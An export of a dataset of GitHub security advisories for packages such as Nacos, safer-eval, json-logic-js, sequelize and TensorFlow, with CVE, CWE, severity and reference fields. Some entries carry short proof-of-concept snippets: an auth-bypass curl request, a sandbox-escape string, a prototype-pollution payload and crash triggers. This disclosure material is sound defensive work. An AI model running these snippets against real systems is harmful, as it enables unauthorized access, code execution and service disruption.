ecosystem
stringclasses 14
values | vuln_id
stringlengths 10
19
| summary
stringlengths 4
267
⌀ | details
stringlengths 9
13.5k
| aliases
stringlengths 17
144
⌀ | modified_date
stringdate 2010-05-27 05:47:00
2022-05-10 08:46:52
| published_date
stringdate 2005-12-31 05:00:00
2022-05-10 08:46:50
| severity
stringclasses 5
values | score
float64 0
10
⌀ | cwe_id
stringclasses 988
values | refs
stringlengths 30
17.7k
⌀ | introduced
stringlengths 75
4.26k
⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA
|
GHSA-6xq8-pvg4-3mf3
|
Moderate severity vulnerability that affects org.eclipse.rdf4j:rdf4j-runtime
|
Eclipse RDF4j version < 2.4.0 Milestone 2 contains a XML External Entity (XXE) vulnerability in RDF4j XML parser parsing RDF files that can result in the disclosure of confidential data, denial of service, server side request forgery, port scanning. This attack appear to be exploitable via Specially crafted RDF file.
|
{'CVE-2018-1000644'}
|
2021-09-02T19:12:41Z
|
2018-10-19T16:54:11Z
|
CRITICAL
| 10
|
{'CWE-611'}
|
{'https://github.com/eclipse/rdf4j/issues/1056', 'https://0dd.zone/2018/08/05/rdf4j-XXE/', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000644', 'https://github.com/advisories/GHSA-6xq8-pvg4-3mf3'}
| null |
GHSA
|
GHSA-ghhm-xrwp-75m9
|
bookstack is vulnerable to Improper Access Control
|
bookstack is vulnerable to Improper Access Control
|
{'CVE-2021-4194'}
|
2022-01-14T19:39:05Z
|
2022-01-08T00:34:12Z
|
MODERATE
| 4.3
|
{'CWE-668', 'CWE-284'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-4194', 'https://github.com/bookstackapp/bookstack/commit/cb0d674a71449de883713db2fcdccb6e108992ad', 'https://huntr.dev/bounties/0bc8b3f7-9057-4eb7-a989-24cd5689f114', 'https://github.com/advisories/GHSA-ghhm-xrwp-75m9'}
| null |
GHSA
|
GHSA-762c-v946-pf25
|
Malicious Package in bpi39
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:44:47Z
|
2020-09-04T16:47:33Z
|
CRITICAL
| 9.1
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1373', 'https://github.com/advisories/GHSA-762c-v946-pf25'}
| null |
GHSA
|
GHSA-vf7h-6246-hm43
|
The disqualify lead action may be executed without CSRF token check
|
### Summary
The attacker is able to disqualify any Lead with a Cross-Site Request Forgery (CSRF) attack.
### Workarounds
There are no workarounds that address this vulnerability.
|
{'CVE-2021-39198'}
|
2021-11-22T18:17:11Z
|
2021-11-19T20:18:54Z
|
MODERATE
| 4.2
|
{'CWE-352'}
|
{'https://github.com/oroinc/crm/security/advisories/GHSA-vf7h-6246-hm43', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39198', 'https://github.com/advisories/GHSA-vf7h-6246-hm43'}
| null |
GHSA
|
GHSA-w8qp-hmh5-4v9v
|
Object state limitation has no effect
|
Object state limitation is a policy you can use in your roles to limit access to content based on specific object state values. Due to a flawed earlier update, these limitations were ineffective in releases made since February 16th 2022. They would grant access to the given content regardless of the object state. Depending on how your frontent is designed, knowing the URL to the content may or may not be required to access it. If you are using object state limitations in your roles, this issue is critical. Please apply the fix as soon as possible.
| null |
2022-04-29T16:23:00Z
|
2022-04-29T16:22:58Z
|
CRITICAL
| 0
|
{'CWE-281'}
|
{'https://developers.ibexa.co/security-advisories/ibexa-sa-2022-004-ineffective-object-state-limitation-and-unauthenticated-fastly-purge', 'https://github.com/ezsystems/ezplatform-kernel/security/advisories/GHSA-w8qp-hmh5-4v9v', 'https://github.com/advisories/GHSA-w8qp-hmh5-4v9v'}
| null |
GHSA
|
GHSA-r3x4-wr4h-pw33
|
Sandbox Breakout / Arbitrary Code Execution in safer-eval
|
Versions of `safer-eval` prior to 1.3.4 are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload using constructor properties can escape the sandbox and execute arbitrary code. For example, evaluating he string `console.constructor.constructor('return process')().env` prints `process.env` to the console.
## Recommendation
Upgrade to version 1.3.4 or later.
|
{'CVE-2019-10759'}
|
2021-07-27T22:20:06Z
|
2019-10-21T21:58:34Z
|
CRITICAL
| 9.9
|
{'CWE-94'}
|
{'https://github.com/advisories/GHSA-r3x4-wr4h-pw33', 'https://snyk.io/vuln/SNYK-JS-SAFEREVAL-173772', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10759', 'https://www.npmjs.com/advisories/1021'}
| null |
GHSA
|
GHSA-455m-q3h9-34pf
|
Downloads Resources over HTTP in windows-seleniumjar-mirror
|
Affected versions of `windows-seleniumjar-mirror` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-seleniumjar-mirror`.
## Recommendation
No patch is currently available for this vulnerability.
Currently, the best mitigation is to download the selenium jar file manually from [seleniumHQ](https://www.seleniumhq.org/download/).
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10670'}
|
2021-01-08T21:17:35Z
|
2019-02-18T23:44:29Z
|
HIGH
| 0
|
{'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10670', 'https://github.com/advisories/GHSA-455m-q3h9-34pf', 'https://www.npmjs.com/advisories/281', 'https://nodesecurity.io/advisories/281'}
| null |
GHSA
|
GHSA-rfgg-vccr-m46m
|
Missing release of memory in sized-chunks
|
An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, clone can have a memory-safety issue upon a panic.
|
{'CVE-2020-25794'}
|
2021-08-25T20:45:58Z
|
2021-08-25T20:45:58Z
|
HIGH
| 7.5
|
{'CWE-401'}
|
{'https://github.com/advisories/GHSA-rfgg-vccr-m46m', 'https://github.com/bodil/sized-chunks/issues/11', 'https://rustsec.org/advisories/RUSTSEC-2020-0041.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25794'}
| null |
GHSA
|
GHSA-mc7w-4cjf-c973
|
OS Command Injection in node-opencv
|
utils/find-opencv.js in node-opencv (aka OpenCV bindings for Node.js) prior to 6.1.0 is vulnerable to Command Injection. It does not validate user input allowing attackers to execute arbitrary commands.
|
{'CVE-2019-10061'}
|
2021-10-12T22:06:57Z
|
2021-10-12T22:06:57Z
|
CRITICAL
| 9.8
|
{'CWE-78'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10061', 'https://www.npmjs.com/advisories/789', 'https://github.com/advisories/GHSA-mc7w-4cjf-c973', 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b', 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563', 'https://www.npmjs.com/package/opencv'}
| null |
GHSA
|
GHSA-36hp-jr8h-556f
|
Authentication Bypass
|
When configured to use authentication (`-Dnacos.core.auth.enabled=true`) Nacos uses the `AuthFilter` servlet filter to enforce authentication. This filter has a [backdoor](https://github.com/alibaba/nacos/blob/5fa05aef52f7432aeab19fe53035431b9d8c91d9/core/src/main/java/com/alibaba/nacos/core/auth/AuthFilter.java#L78-L81) that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the `user-agent` HTTP header so it can be easily spoofed.
The following request to the `configuration` endpoint gets rejected as we are not providing any credentials:
```
❯ curl -X POST "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
{"timestamp":"2020-12-02T14:33:57.154+0000","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/cs/configs"}
```
However the following one gets accepted by using the `Nacos-Server` user-agent header:
```
❯ curl -X POST -A Nacos-Server "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
true
```
#### Impact
This issue may allow any user to carry out any administrative tasks on the Nacos server.
|
{'CVE-2021-29441'}
|
2021-05-10T14:56:08Z
|
2021-04-27T20:09:17Z
|
HIGH
| 0
|
{'CWE-290'}
|
{'https://github.com/alibaba/nacos/pull/4703', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29441', 'https://github.com/advisories/GHSA-36hp-jr8h-556f', 'https://github.com/alibaba/nacos/issues/4701'}
| null |
GHSA
|
GHSA-fw4p-36j9-rrj3
|
Denial of Service in sequelize
|
Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a `TypeError` exception for the `results` variable. The `results` value may be undefined and trigger the error on a `.map` call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.
The following proof-of-concept crashes the Node process:
```
const Sequelize = require('sequelize');
const sequelize = new Sequelize({
dialect: 'sqlite',
storage: 'database.sqlite'
});
const TypeError = sequelize.define('TypeError', {
name: Sequelize.STRING,
});
TypeError.sync({force: true}).then(() => {
return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});
```
## Recommendation
Upgrade to version 4.44.4 or later.
| null |
2020-09-03T20:25:33Z
|
2020-09-03T20:25:33Z
|
MODERATE
| 0
| null |
{'https://www.npmjs.com/advisories/1142', 'https://github.com/advisories/GHSA-fw4p-36j9-rrj3', 'https://github.com/sequelize/sequelize/pull/11877'}
| null |
GHSA
|
GHSA-xwg3-qrcg-w9x6
|
Timing side channel vulnerability in UIDL request handler in Vaadin 10, 11-14, and 15-18
|
Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:flow-server` versions 1.0.0 through 1.0.13 (Vaadin 10.0.0 through 10.0.16), 1.1.0 prior to 2.0.0 (Vaadin 11 through 13), 2.0.0 through 2.4.6 (Vaadin 14.0.0 through 14.4.6), 3.0.0 prior to 5.0.0 (Vaadin 15 prior to 18), and 5.0.0 through 5.0.2 (Vaadin 18.0.0 through 18.0.5) allows attacker to guess a security token via timing attack.
- https://vaadin.com/security/cve-2021-31404
|
{'CVE-2021-31404'}
|
2022-04-19T19:02:54Z
|
2021-04-19T14:51:25Z
|
MODERATE
| 4
|
{'CWE-208', 'CWE-203'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-31404', 'https://vaadin.com/security/cve-2021-31404', 'https://github.com/advisories/GHSA-xwg3-qrcg-w9x6', 'https://github.com/vaadin/flow/security/advisories/GHSA-xwg3-qrcg-w9x6', 'https://github.com/vaadin/flow/pull/9875'}
| null |
GHSA
|
GHSA-jppx-hw2f-8gx4
|
Downloads Resources over HTTP in chromedriver126
|
Affected versions of `chromedriver126` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `chromedriver126`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10609'}
|
2021-01-08T18:32:36Z
|
2019-02-18T23:33:30Z
|
HIGH
| 0
|
{'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10609', 'https://nodesecurity.io/advisories/203', 'https://github.com/advisories/GHSA-jppx-hw2f-8gx4', 'https://www.npmjs.com/advisories/203'}
| null |
GHSA
|
GHSA-mfv8-q39f-mgfg
|
Cross-site Scripting in invenio-communities
|
## Cross-Site Scripting (XSS) vulnerability in Jinja templates
### Impact
A Cross-Site Scripting (XSS) vulnerability was discovered in two Jinja templates in the Invenio-Communities module. The vulnerability allows a user to create a new community and include script element tags inside the description and page fields.
### Patches
The problem has been patched in v1.0.0a20.
### For more information
If you have any questions or comments about this advisory:
* Email us at [info@inveniosoftware.org](mailto:info@inveniosoftware.org)
|
{'CVE-2019-1020005'}
|
2021-04-12T21:50:38Z
|
2019-07-16T00:52:26Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-mfv8-q39f-mgfg', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1020005', 'https://github.com/inveniosoftware/invenio-communities/security/advisories/GHSA-mfv8-q39f-mgfg'}
| null |
GHSA
|
GHSA-7rg4-266c-jqw6
|
Predictable CSRF tokens in centreon/centreon
|
An issue was discovered in Centreon-Web in Centreon Platform 20.10.0. The anti-CSRF token generation is predictable, which might allow CSRF attacks that add an admin user.
|
{'CVE-2021-28055'}
|
2021-06-08T20:12:56Z
|
2021-06-08T20:12:56Z
|
MODERATE
| 6.5
|
{'CWE-352', 'CWE-330'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-28055', 'https://github.com/centreon/centreon/commit/626d3fb91cef402df0ebda5a8165d8f45da67c7a', 'https://github.com/centreon/centreon/pull/9612', 'https://github.com/centreon/centreon/releases/tag/2.8.37', 'https://github.com/advisories/GHSA-7rg4-266c-jqw6', 'https://github.com/centreon/centreon/commit/0261d4b250135eb513fdb7d52ba6fdeb19c6863f', 'https://github.com/centreon/centreon/releases/tag/19.10.23'}
| null |
GHSA
|
GHSA-99ch-8mvp-g7m5
|
Critical severity vulnerability that affects md2pdf
|
converter.rb in the md2pdf gem 0.0.1 for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a filename.
|
{'CVE-2013-1948'}
|
2021-12-02T22:35:47Z
|
2017-10-24T18:33:37Z
|
CRITICAL
| 0
| null |
{'http://osvdb.org/92290', 'https://nvd.nist.gov/vuln/detail/CVE-2013-1948', 'http://vapid.dhs.org/advisories/md2pdf-remote-exec.html', 'http://www.securityfocus.com/bid/59061', 'https://github.com/advisories/GHSA-99ch-8mvp-g7m5', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/83416'}
| null |
GHSA
|
GHSA-c6j7-4fr9-c76p
|
Incorrect permissions in Apache Ozone
|
In Apache Ozone before 1.2.0, Ozone Datanode doesn't check the access mode parameter of the block token. Authenticated users with valid READ block token can do any write operation on the same block.
|
{'CVE-2021-39235'}
|
2021-11-23T18:17:41Z
|
2021-11-23T18:17:41Z
|
MODERATE
| 6.5
|
{'CWE-732'}
|
{'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C93f88246-4320-7423-0dac-ec7a07f47455%40apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39235', 'http://www.openwall.com/lists/oss-security/2021/11/19/6', 'https://github.com/advisories/GHSA-c6j7-4fr9-c76p'}
| null |
GHSA
|
GHSA-m9hw-7xfv-wqg7
|
Prototype Pollution in json-logic-js
|
Versions of json-logic-js prior to 2.0.0 are vulnerable to Prototype Pollution. The method operation allows a malicious user to modify the prototype of Object through the method property name. This causes modification of any existing property that will exist on all objects and leads to Remote Code Execution.
The following rule creates a popup when run from a browser:
```
{
"method": [
{
"method": [
{
"var": "__proto__.constructor.is.__proto__"
},
"constructor",
[
"var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)"
]
]
},
"call"
]
}
```
| null |
2020-11-12T19:36:14Z
|
2020-11-12T19:36:14Z
|
HIGH
| 0
|
{'CWE-471'}
|
{'https://github.com/advisories/GHSA-m9hw-7xfv-wqg7', 'https://www.npmjs.com/advisories/1542', 'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b', 'https://www.npmjs.com/package/json-logic-js'}
| null |
GHSA
|
GHSA-wm2r-rp98-8pmh
|
Exposure of SSH credentials in Rancher/Fleet
|
### Impact
This vulnerability only affects customers using Fleet for continuous delivery with authenticated Git and/or Helm repositories.
A security vulnerability ([CVE-2022-29810](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29810)) was discovered in `go-getter` library in versions prior to [`v1.5.11`](https://github.com/hashicorp/go-getter/releases/tag/v1.5.11) that exposes SSH private keys in base64 format due to a failure in redacting such information from error messages. The vulnerable version of this library is used in Rancher through Fleet in versions of Fleet prior to [`v0.3.9`](https://github.com/rancher/fleet/releases/tag/v0.3.9). This issue affects Rancher versions 2.5.0 up to and including 2.5.12 and from 2.6.0 up to and including 2.6.3.
When Git and/or Helm authentication is configured in [Fleet](https://rancher.com/docs/rancher/v2.6/en/deploy-across-clusters/fleet/) and Fleet is used to deploy a git repo through `Continuous Delivery`, the affected `go-getter` version will expose the configured SSH private key secret if Fleet fails to download the git repo due to a misconfigured URL. The exposed SSH key is logged in base64 format as a query parameter together with the git URL. The credentials can be seen in Rancher UI and in Fleet's deployment pod logs.
### Patches
Patched versions include releases 2.5.13, 2.6.4 and later versions.
### Workarounds
There is not a direct mitigation besides upgrading to the patched Rancher versions. Until you are able to upgrade, limit access in Rancher to trusted users and carefully validate the URLs you are using are correct. Please note that the SSH key might still be compromised in valid URLs if the service goes down or a connection error happens when pulling from the repos.
**Note:** If you believe that SSH keys might have been exposed in your environment, it's highly advised to rotate them.
### Credits
This issue was found and reported by Dagan Henderson from Raft Engineering.
### For more information
If you have any questions or comments about this advisory:
* Reach out to [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.
* Open an issue in [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.
* Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).
| null |
2022-04-27T21:09:14Z
|
2022-04-27T21:09:13Z
|
LOW
| 0
|
{'CWE-200'}
|
{'https://github.com/rancher/rancher/security/advisories/GHSA-wm2r-rp98-8pmh', 'https://github.com/advisories/GHSA-wm2r-rp98-8pmh'}
| null |
GHSA
|
GHSA-9p47-w5xp-f4xr
|
Downloads Resources over HTTP in windows-build-tools
|
Affected versions of `windows-build-tools` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-build-tools`.
## Recommendation
Update to version 1.0.0 or later.
|
{'CVE-2017-16003'}
|
2021-01-08T19:03:26Z
|
2018-11-09T17:48:37Z
|
HIGH
| 0
|
{'CWE-311'}
|
{'https://www.npmjs.com/advisories/304', 'https://github.com/advisories/GHSA-9p47-w5xp-f4xr', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16003', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://nodesecurity.io/advisories/304', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)'}
| null |
GHSA
|
GHSA-hjp8-2cm3-cc45
|
Cookie exposure in requestretry
|
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0 via cookies being leaked to external sites.
|
{'CVE-2022-0654'}
|
2022-03-03T22:02:14Z
|
2022-02-24T00:00:54Z
|
HIGH
| 7.5
|
{'CWE-200'}
|
{'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a', 'https://huntr.dev/bounties/a779faf5-c2cc-48be-a31d-4ddfac357afc', 'https://github.com/advisories/GHSA-hjp8-2cm3-cc45', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0654'}
| null |
GHSA
|
GHSA-w2f4-hxpm-mq98
|
bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type
|
bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type.
|
{'CVE-2021-3915'}
|
2021-11-17T21:12:03Z
|
2021-11-15T23:17:37Z
|
HIGH
| 7.6
|
{'CWE-434'}
|
{'https://github.com/bookstackapp/bookstack/commit/ae155d67454d6b9f6c93b2bb457aaa4b2eb1a9ed', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3915', 'https://huntr.dev/bounties/fcb65f2d-257a-46f4-bac9-f6ded5649079', 'https://github.com/advisories/GHSA-w2f4-hxpm-mq98'}
| null |
GHSA
|
GHSA-748f-wv76-x9hg
|
Arbitrary file upload in Fork CMS
|
Arbitrary file upload vulnerability in Fork CMS 5.9.2 allows attackers to create or replace arbitrary files in the /themes directory via a crafted zip file uploaded to the Themes panel.
|
{'CVE-2021-28931'}
|
2021-09-08T17:26:26Z
|
2021-09-08T17:26:26Z
|
HIGH
| 8.8
|
{'CWE-434'}
|
{'https://github.com/bousalman/ForkCMS-arbitrary-upload/blob/main/README.md', 'https://github.com/forkcms/forkcms/pull/3351', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28931', 'https://github.com/advisories/GHSA-748f-wv76-x9hg', 'https://github.com/forkcms/forkcms/releases/tag/5.9.2'}
| null |
GHSA
|
GHSA-59q2-x2qc-4c97
|
Heap OOB access in unicode ops
|
### Impact
An attacker can access data outside of bounds of heap allocated array in `tf.raw_ops.UnicodeEncode`:
```python
import tensorflow as tf
input_values = tf.constant([58], shape=[1], dtype=tf.int32)
input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32)
output_encoding = "UTF-8"
tf.raw_ops.UnicodeEncode(
input_values=input_values, input_splits=input_splits,
output_encoding=output_encoding)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/472c1f12ad9063405737679d4f6bd43094e1d36d/tensorflow/core/kernels/unicode_ops.cc)
assumes that the `input_value`/`input_splits` pair specify a valid sparse tensor.
### Patches
We have patched the issue in GitHub commit [51300ba1cc2f487aefec6e6631fef03b0e08b298](https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
|
{'CVE-2021-29559'}
|
2021-05-21T14:24:54Z
|
2021-05-21T14:24:54Z
|
LOW
| 2.5
|
{'CWE-125'}
|
{'https://github.com/advisories/GHSA-59q2-x2qc-4c97', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-59q2-x2qc-4c97', 'https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29559'}
| null |
GHSA
|
GHSA-f96g-24cg-f24w
|
SQL Injection in odata4j
|
odata4j 0.7.0 allows ExecuteJPQLQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.
|
{'CVE-2016-11024'}
|
2021-05-07T15:52:41Z
|
2021-05-07T15:52:41Z
|
HIGH
| 9.8
|
{'CWE-89'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-11024', 'https://github.com/advisories/GHSA-f96g-24cg-f24w', 'https://groups.google.com/d/msg/odata4j-discuss/_lBwwXP30g0/Av6zkZMdBwAJ'}
| null |
GHSA
|
GHSA-hwcf-pp87-7x6p
|
Moderate severity vulnerability that affects ejs
|
nodejs ejs version older than 2.5.5 is vulnerable to a Cross-site-scripting in the ejs.renderFile() resulting in code injection
|
{'CVE-2017-1000188'}
|
2021-09-14T17:32:10Z
|
2017-11-30T23:15:05Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f', 'http://www.securityfocus.com/bid/101889', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000188', 'https://github.com/advisories/GHSA-hwcf-pp87-7x6p'}
| null |
GHSA
|
GHSA-4vrf-ff7v-hpgr
|
Division by zero in TFLite's implementation of `EmbeddingLookup`
|
The implementation of the `EmbeddingLookup` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/e4b29809543b250bc9b19678ec4776299dd569ba/tensorflow/lite/kernels/embedding_lookup.cc#L73-L74):
```cc
const int row_size = SizeOfDimension(value, 0);
const int row_bytes = value->bytes / row_size;
```
An attacker can craft a model such that the first dimension of the `value` input is 0.
### Patches
We have patched the issue in GitHub commit [f61c57bd425878be108ec787f4d96390579fb83e](https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-29596'}
|
2021-05-21T14:27:51Z
|
2021-05-21T14:27:51Z
|
LOW
| 2.5
|
{'CWE-369'}
|
{'https://github.com/advisories/GHSA-4vrf-ff7v-hpgr', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4vrf-ff7v-hpgr', 'https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29596'}
| null |
GHSA
|
GHSA-66rh-8fw6-59q6
|
Prototype Pollution in assign-deep
|
Versions of `assign-deep` prior to 1.0.1 are vulnerable to Prototype Pollution. The `assign` function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.
## Recommendation
Upgrade to version 1.0.1 or later.
|
{'CVE-2019-10745'}
|
2021-07-27T21:04:17Z
|
2019-08-21T16:15:13Z
|
HIGH
| 7.5
|
{'CWE-20', 'CWE-915'}
|
{'https://www.npmjs.com/advisories/1014', 'https://snyk.io/vuln/SNYK-JS-ASSIGNDEEP-450211', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10745', 'https://github.com/advisories/GHSA-66rh-8fw6-59q6'}
| null |
GHSA
|
GHSA-3wxm-m9m4-cprj
|
Import of incorrectly embargoed keys could cause early publication
|
### Impact
If your installation is using the `export-importer` service, there is potential impact.
If your installation is not importing keys via the `export-importer` services, your installation is not impacted.
In versions `0.19.1` and earlier, the `export-importer` service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo keys.
This could allow allow for imported keys to be re-published before they have expired, allowing for potential replay of RPIs.
### Patches
This is patched in `v0.18.3` and all versions `0.19.2` and later.
### Workarounds
Ensure that the servers you are importing export zip files from are not publishing keys too early.
### References
n/a
### For more information
If you have any questions or comments about this advisory
* Open an issue in [exposure-notifications-server](https://github.com/google/exposure-notifications-server/)
* Email us at [exposure-notifications-feedback@google.com](mailto:exposure-notifications-feedback@google.com)
| null |
2021-05-21T16:24:44Z
|
2021-05-21T16:24:44Z
|
MODERATE
| 0
| null |
{'https://github.com/google/exposure-notifications-server/security/advisories/GHSA-3wxm-m9m4-cprj', 'https://github.com/advisories/GHSA-3wxm-m9m4-cprj'}
| null |
GHSA
|
GHSA-h676-pjr4-hgqx
|
Path Traversal in S-Cart
|
A Directory Traversal vulnerability exists in S-Cart 6.7 via download in sc-admin/backup.
|
{'CVE-2021-44111'}
|
2022-02-26T00:28:57Z
|
2022-02-12T00:00:42Z
|
MODERATE
| 4.4
|
{'CWE-22'}
|
{'https://github.com/s-cart/core/commit/328dd312866b86144b43941dee2ad942708f70da', 'https://nvd.nist.gov/vuln/detail/CVE-2021-44111', 'https://github.com/s-cart/s-cart/issues/102', 'https://github.com/advisories/GHSA-h676-pjr4-hgqx'}
| null |
GHSA
|
GHSA-h9wr-xr4r-66fh
|
Cross-Site Scripting in dmn-js-properties-panel
|
Versions of `dmn-js-properties-panel` prior to 0.8.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website.
## Recommendation
Upgrade to version 0.3.0 or later.
| null |
2021-09-29T16:21:29Z
|
2020-09-03T18:20:20Z
|
HIGH
| 0
|
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/1081', 'https://github.com/advisories/GHSA-h9wr-xr4r-66fh'}
| null |
GHSA
|
GHSA-x3v8-c8qx-3j3r
|
Null pointer exception in `DeserializeSparse`
|
### Impact
The [shape inference code for `DeserializeSparse`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/sparse_ops.cc#L152-L168) can trigger a null pointer dereference:
```python
import tensorflow as tf
dataset = tf.data.Dataset.range(3)
@tf.function
def test():
y = tf.raw_ops.DeserializeSparse(
serialized_sparse=tf.data.experimental.to_variant(dataset),
dtype=tf.int32)
test()
```
This is because the shape inference function assumes that the `serialize_sparse` tensor is a tensor with positive rank (and having `3` as the last dimension). However, in the example above, the argument is a scalar (i.e., rank 0).
### Patches
We have patched the issue in GitHub commit [d3738dd70f1c9ceb547258cbb82d853da8771850](https://github.com/tensorflow/tensorflow/commit/d3738dd70f1c9ceb547258cbb82d853da8771850).
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-41215'}
|
2021-11-10T18:57:45Z
|
2021-11-10T18:57:45Z
|
MODERATE
| 5.5
|
{'CWE-476'}
|
